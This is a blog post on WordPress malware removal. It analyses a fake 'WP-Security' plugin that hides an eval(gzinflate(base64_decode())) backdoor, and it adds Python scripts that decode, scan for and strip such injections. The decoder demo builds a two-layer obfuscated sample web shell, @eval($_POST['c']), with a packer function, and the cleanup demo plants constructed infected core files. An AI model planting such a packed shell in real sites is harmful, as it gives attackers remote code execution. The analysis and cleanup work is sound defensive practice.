The “WP-Security” Phishing Plugin – Analyzing the Fake WordPress Security Team Malware

Published on 12/25/2025
MD Pabel

Introduction: The “Wolf in Sheep’s Clothing”

If you are reading this, you probably found a suspicious folder at wp-content/plugins/WP-Security in your file manager, or your security scanner flagged a file containing a long string of random-looking characters wrapped in eval(gzinflate(base64_decode(...))).

Here is the hard truth: “WP-Security” is not a legitimate plugin.

Despite claiming to be authored by the “WordPress Security Team,” this is malware: a Trojan-style backdoor loader. It relies on social engineering, mimicking the look of a real security tool, to persuade site administrators to leave it installed.

What exactly is the WP-Security Malware?

Hackers know that if they name a malicious file hack-script.php, you will delete it immediately. Instead, they camouflage it.

This malware creates a directory that looks legitimate alongside your other plugins (like WooCommerce or WP Mail SMTP). It includes a standard plugin header (the text at the top of the file) that claims:

  • Plugin Name: WordPress Security
  • Author: WordPress Security Team (Note: This is a fake author; no such official team publishes a plugin under this name)
  • Description: “Enhance the security of your WordPress site…”

This text is purely for show. The legitimate WordPress security team does not release a plugin with this generic name or structure.

How It Works: The eval Obfuscation

The core of this malware lies in the code immediately following the fake description. You will see a line that looks like this:

eval(gzinflate(base64_decode('DZVFrsUIggSP01X...')));

The 3-Step Attack Process:

  1. base64_decode: The long string of letters, digits, “+” and “/” is Base64-encoded data. Base64 is not encryption; it simply hides the PHP source from a casual reader and from scanners that match on plain keywords.
  2. gzinflate: Before encoding, the attacker compressed the code with raw DEFLATE (no gzip header). gzinflate() decompresses it back into PHP source; compression both shortens the string and removes any recognizable text from it.
  3. eval: The most dangerous step. It executes the recovered source as PHP with the same privileges as your site, so the attacker’s code runs every time WordPress loads the plugin file.
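The three steps above can be reversed without ever calling eval, and doing so is worth the minute it takes: the decoded output tells you what else the attacker installed. The script below is an added example, not code from the original post or from the malware; it assumes the payload uses exactly the eval/gzinflate/base64_decode chain (possibly nested several times) and builds a constructed sample inline so it runs offline. The DANGEROUS triage list is an assumed heuristic. On a real site, replace SAMPLE_FILE with the contents of the flagged plugin file.

```python
"""Added example: unwrap eval(gzinflate(base64_decode('...'))) layers WITHOUT executing them.

Assumptions (not from the original post): the payload uses the exact three-call chain
shown in the article, possibly nested. A constructed sample is built inline so the
script runs offline; on a real site, SAMPLE_FILE is the flagged plugin file's contents.
"""
import base64
import re
import zlib
from typing import List, Optional

# One obfuscation layer: eval(gzinflate(base64_decode('<base64>')))
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.DOTALL,
)

# Substrings whose presence in decoded output marks it for closer review (assumed heuristic;
# plain substring matches, so "eval" would also fire on a word like "retrieval").
DANGEROUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open",
             "eval", "assert", "create_function", "file_put_contents", "move_uploaded_file",
             "$_POST", "$_GET", "$_REQUEST", "$_COOKIE")


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() reads raw DEFLATE (no zlib/gzip header), hence negative wbits."""
    return zlib.decompress(data, -zlib.MAX_WBITS)


def peel_layer(php_source: str) -> Optional[str]:
    """Return the PHP that eval() would run, or None if no layer is present."""
    m = LAYER_RE.search(php_source)
    if m is None:
        return None
    blob = re.sub(r"\s+", "", m.group(1))          # some packers wrap the blob across lines
    raw = base64.b64decode(blob, validate=True)     # reject anything that is not Base64
    return gzinflate(raw).decode("utf-8", errors="replace")


def unwrap(php_source: str, max_layers: int = 10) -> List[str]:
    """Peel nested layers; the last element is the code that finally executes."""
    layers: List[str] = []
    current = php_source
    for _ in range(max_layers):            # bounded: a layer could decode to itself
        nxt = peel_layer(current)
        if nxt is None:
            break
        layers.append(nxt)
        current = nxt
    return layers


def triage(php_source: str) -> List[str]:
    """Names from DANGEROUS that occur in the decoded code, in DANGEROUS order."""
    return [name for name in DANGEROUS if name in php_source]


# ---- constructed sample (NOT a real captured payload) ---------------------------------
def wrap(php_code: str) -> str:
    """Build one layer the way a packer does: raw DEFLATE, then Base64, then the eval chain."""
    packer = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = packer.compress(php_code.encode("utf-8")) + packer.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode("ascii")


# Stand-in for the attacker's web shell: evaluates whatever is POSTed as 'c'.
INNER_SHELL = "if (isset($_POST['c'])) { @eval($_POST['c']); }"
SAMPLE_FILE = (
    "<?php\n/*\nPlugin Name: WordPress Security\nAuthor: WordPress Security Team\n*/\n"
    + wrap(wrap(INNER_SHELL)) + "\n"        # two nested layers
)

if __name__ == "__main__":
    for depth, code in enumerate(unwrap(SAMPLE_FILE), start=1):
        print("--- layer %d ---\n%s\nflags: %s" % (depth, code, triage(code)))
```

Keep the decoded layers with your incident notes: file names, option keys, user names and URLs that appear in the final layer are exactly the things to search for in the rest of the site and the database.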

What does the hidden code do?

Once decoded, this script usually functions as a Web Shell. It gives the attacker full control over your website, allowing them to:

  • Create, delete, or modify files on your server.
  • Create fake admin accounts to regain access later.
  • Inject spam links (SEO spam) into your posts to push search traffic to the attacker’s sites.
  • Redirect your legitimate visitors to scam sites.

Why did I get infected?

Finding this plugin is usually a symptom of a previous breach. It was most likely dropped by an automated bot after the site was compromised through one of the following:

  1. Another outdated plugin: (e.g., an old version of Elementor, WooCommerce, or a slider plugin).
  2. Compromised Credentials: An admin password that was reused or stolen.
  3. Nulled Themes: If you downloaded a “premium” theme for free from a pirate site, this backdoor often comes pre-installed.

Identification Guide: Do I have it?

Search your server (via FTP or File Manager) for the following indicators:

  • File Path: /wp-content/plugins/WP-Security/
  • File Content: Look for the specific string eval(gzinflate(base64_decode near the top of the file.
  • Author URL: The plugin header typically links to https://wordpress.org in general rather than to a specific plugin page; there is no official repository listing that matches this plugin.
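The three indicators above can be checked mechanically across a whole install. The scanner below is an added example, not code from the original post or from any security product; it takes the directory name, the fake author, the fake plugin name and the eval chain from this article, and (going slightly beyond the article) also flags eval() wrapped around the sibling decoders gzuncompress, str_rot13 and base64_decode, which appear in the same role. It builds a small fake install in a temporary directory so it runs offline; point scan_tree() at a real wp-content to use it.

```python
"""Added example: walk a WordPress install and report the indicators listed in the article.

Assumptions (not from the original post): SUSPECT_* values are taken from this article's
description; EVAL_CHAIN_RE is wider than the single gzinflate chain shown. The fake install
in FILES is constructed here so the script runs offline.
"""
import os
import re
import tempfile
from typing import Dict, List

# The article's chain, plus sibling decoders that show up in the same eval() position.
EVAL_CHAIN_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\("
)
# Plugin header fields; "Author URI:" deliberately does not match "Author:".
HEADER_FIELD_RE = re.compile(r"^[ \t*]*(Plugin Name|Author):[ \t]*(.+?)[ \t]*$", re.MULTILINE)
SUSPECT_DIRS = {"wp-security"}                      # compared case-insensitively
SUSPECT_AUTHORS = {"wordpress security team"}
SUSPECT_NAMES = {"wordpress security"}


def scan_file(path: str) -> List[str]:
    """Return the indicator names that fire on one PHP file (empty list = nothing found)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits: List[str] = []
    if EVAL_CHAIN_RE.search(text):
        hits.append("eval-of-decoder")
    header = dict((k, v.lower()) for k, v in HEADER_FIELD_RE.findall(text[:4096]))
    if header.get("Author") in SUSPECT_AUTHORS:
        hits.append("fake-author")
    if header.get("Plugin Name") in SUSPECT_NAMES:
        hits.append("fake-plugin-name")
    parts = {p.lower() for p in os.path.normpath(path).split(os.sep)}
    if parts & SUSPECT_DIRS:
        hits.append("suspect-directory")
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Map relative path -> indicators for every .php file with at least one hit."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


# ---- constructed fake install (not real site data) -------------------------------------
FAKE_BLOB = "H4sIAAAAAA"  # Base64-looking filler; it is never decoded here
FILES = {
    "wp-content/plugins/WP-Security/wp-security.php":
        "<?php\n/*\nPlugin Name: WordPress Security\nAuthor: WordPress Security Team\n"
        "Description: Enhance the security of your WordPress site\n*/\n"
        "eval(gzinflate(base64_decode('%s')));\n" % FAKE_BLOB,
    "wp-content/plugins/woocommerce/woocommerce.php":
        "<?php\n/*\nPlugin Name: WooCommerce\nAuthor: Automattic\n*/\n"
        "define('WC_PLUGIN_FILE', __FILE__);\n",
    "index.php":
        "<?php eval(gzinflate(base64_decode('%s'))); ?><?php\n"
        "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n" % FAKE_BLOB,
}


def build_fake_site() -> str:
    """Write FILES under a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    for rel, body in FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_fake_site()).items()):
        print("%-55s %s" % (rel, ", ".join(hits)))
```

Treat "eval-of-decoder" as a triage signal rather than a verdict: some badly written commercial code obfuscates itself the same way, so decode what you find and read it before deleting. A clean root index.php never contains eval() at all, which is why the sample flags it on that indicator alone.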

How to Remove the WP-Security Malware

Step 1: Backup Your Site
Before deleting anything, take a full backup of your database and files.

Step 2: Delete the Folder
Navigate to wp-content/plugins/ and delete the entire WP-Security folder. Do not just deactivate it; delete the files from the server.

Step 3: Check index.php and wp-config.php
This malware is rarely alone. Check your root index.php and wp-config.php files. If you see the same eval(gzinflate... code at the top of those files, carefully remove only that statement. It is often prepended on the same line as the file’s legitimate opening <?php tag, so remove the eval statement (and the extra <?php ... ?> wrapper if it has one), not the tag that the real code depends on.

Step 4: Audit User Accounts
Go to your WordPress Dashboard > Users. Look for any Administrator accounts you do not recognize (often named wp-support, sys-admin, or random letters). Delete them immediately.

Step 5: Install a Real Security Scanner
Install a reputable security plugin (like Wordfence or Sucuri) and run a “High Sensitivity” scan to find any other hidden backdoors.
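The file surgery in Step 3 is where a hand edit most often goes wrong (the legitimate opening tag disappears along with the injection). The script below is an added example, not code from the original post or from any security plugin; it backs a file up before touching it, removes only the eval(gzinflate(base64_decode(...))) statement in either of the two shapes named in the lead comment, and leaves any other shape alone for manual review. The sample index.php and wp-config.php contents are constructed here.

```python
"""Added example for Step 3: strip a prepended eval(gzinflate(base64_decode(...))) statement
from a core file while leaving the legitimate code intact, with a backup written first.

Assumptions (not from the original post): the injection is either (1) its own
'<?php ... ?>' block in front of the real file, or (2) a bare statement inside the file's
own PHP block. Anything else is left untouched. Sample files are constructed here.
"""
import os
import re
import shutil
import tempfile
import time
from typing import Tuple

B64 = r"['\"][A-Za-z0-9+/=\s]*['\"]"
CHAIN = r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*" + B64 + r"\s*\)\s*\)\s*\)\s*;?"
# Form 1: a self-contained <?php ... ?> block injected in front of the real file.
WRAPPED_RE = re.compile(r"<\?php\s*" + CHAIN + r"\s*\?>\s*", re.DOTALL)
# Form 2: the bare statement dropped inside the file's own <?php block.
BARE_RE = re.compile(CHAIN + r"[ \t]*\r?\n?", re.DOTALL)


def strip_injected_eval(text: str) -> Tuple[str, int]:
    """Return (cleaned_text, statements_removed). Only the eval chain itself is removed."""
    text, n_wrapped = WRAPPED_RE.subn("", text)   # wrapped form first, so the real file's
    text, n_bare = BARE_RE.subn("", text)         # own opening <?php tag is never consumed
    return text, n_wrapped + n_bare


def clean_file(path: str) -> int:
    """Back the file up as <name>.bak-<timestamp>, then rewrite it without the injection."""
    with open(path, "r", encoding="utf-8", errors="surrogateescape", newline="") as fh:
        original = fh.read()
    cleaned, removed = strip_injected_eval(original)
    if removed:
        shutil.copy2(path, "%s.bak-%d" % (path, int(time.time())))
        with open(path, "w", encoding="utf-8", errors="surrogateescape", newline="") as fh:
            fh.write(cleaned)
    return removed


# ---- constructed samples (not real site files) ---------------------------------------
BLOB = "SGVsbG8="   # Base64-looking filler; it is never decoded here
CLEAN_INDEX = ("<?php\n/**\n * Front to the WordPress application.\n */\n"
               "define('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n")
CLEAN_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\nrequire_once ABSPATH . 'wp-settings.php';\n"
# Form 1 in index.php: injected block glued to the real opening tag on the same line.
INFECTED_INDEX = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % BLOB + CLEAN_INDEX
# Form 2 in wp-config.php: bare statement on its own line inside the real PHP block.
INFECTED_CONFIG = CLEAN_CONFIG.replace(
    "<?php\n", "<?php\neval(gzinflate(base64_decode('%s')));\n" % BLOB, 1)


def demo() -> Tuple[int, int]:
    """Write both infected samples to a temp dir, clean them, return the removal counts."""
    root = tempfile.mkdtemp(prefix="wp-clean-demo-")
    for name, body in (("index.php", INFECTED_INDEX), ("wp-config.php", INFECTED_CONFIG)):
        with open(os.path.join(root, name), "w", encoding="utf-8", newline="") as fh:
            fh.write(body)
    return (clean_file(os.path.join(root, "index.php")),
            clean_file(os.path.join(root, "wp-config.php")))


if __name__ == "__main__":
    print("removed statements (index.php, wp-config.php):", demo())
```

After cleaning, lint each file with `php -l index.php` (and the same for wp-config.php) before loading the site; a stray tag left behind by a hand edit shows up there rather than as a white screen. For Step 4, `wp user list --role=administrator --fields=ID,user_login,user_email,user_registered` from WP-CLI gives the same administrator listing from the shell, which is handy when you no longer trust the dashboard.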


Conclusion

The “WP-Security” plugin is a classic example of hackers hiding in plain sight. By using a trustworthy-sounding name, they hope you will hesitate to delete it.

The Rule of Thumb: If you didn’t install it, and you can’t find it on the official WordPress.org plugin repository, it doesn’t belong on your site.


About the Author

MD Pabel


MD Pabel is the Founder and CEO of 3Zero Digital, an agency specializing in custom web development, WordPress security, and malware removal. With over 7 years of experience, he has completed more than 3,200 projects, served over 2,300 clients, and resolved more than 4,500 cases of malware and hacked websites.